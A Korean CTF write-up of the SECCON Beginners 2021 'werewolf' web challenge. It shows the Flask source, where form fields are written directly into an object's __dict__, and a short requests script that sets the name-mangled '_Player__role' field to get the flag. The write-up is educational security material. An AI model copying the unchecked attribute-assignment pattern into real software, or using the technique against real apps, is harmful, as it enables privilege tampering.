[SECCON - Beginners_CTF_2021] werewolf

1. 개요

web, python class private 멤버 변수 문제

 

2. 분석

코드를 보면, 다음과 같이 role 넣으면 될 것 같지만 안됩니다.

    data = {
        "role": "WEREWOLF",
    }

 

Player 클래스를 보면 role은 접두사로 __(언더바 2개)를 붙여서 private으로 선언했습니다.

그래서 외부에서 접근할때는 _Player__role 로 접근해야합니다.

 

 

import os
import random
from flask import Flask, render_template, request, session

# ====================

app = Flask(__name__)
app.FLAG = os.getenv("CTF4B_FLAG")

# ====================

class Player:
    def __init__(self):
        self.name = None
        self.color = None
        self.__role = random.choice(['VILLAGER', 'FORTUNE_TELLER', 'PSYCHIC', 'KNIGHT', 'MADMAN'])
        # :-)
        # self.__role = random.choice(['VILLAGER', 'FORTUNE_TELLER', 'PSYCHIC', 'KNIGHT', 'MADMAN', 'WEREWOLF'])

    @property
    def role(self):
        return self.__role

    # :-)
    # @role.setter
    # def role(self, role):
    #     self.__role = role


# ====================

@app.route("/", methods=["GET", "POST"])
def index():
    if request.method == 'GET':
        return render_template('index.html')

    if request.method == 'POST':
        player = Player()

        for k, v in request.form.items():
            player.__dict__[k] = v

        return render_template('result.html',
            name=player.name,
            color=player.color,
            role=player.role,
            flag=app.FLAG if player.role == 'WEREWOLF' else ''
        )

# ====================

if __name__ == '__main__':
    app.run(host=os.getenv("CTF4B_HOST"), port=os.getenv("CTF4B_PORT"))

 

3. exploit

import requests


def get_flag():
    base_url = "http://localhost:80"
    data = {
        "_Player__role": "WEREWOLF"
    }

    r = requests.post(base_url, data=data)

    print('r', r.text)


if __name__ == '__main__':
    get_flag()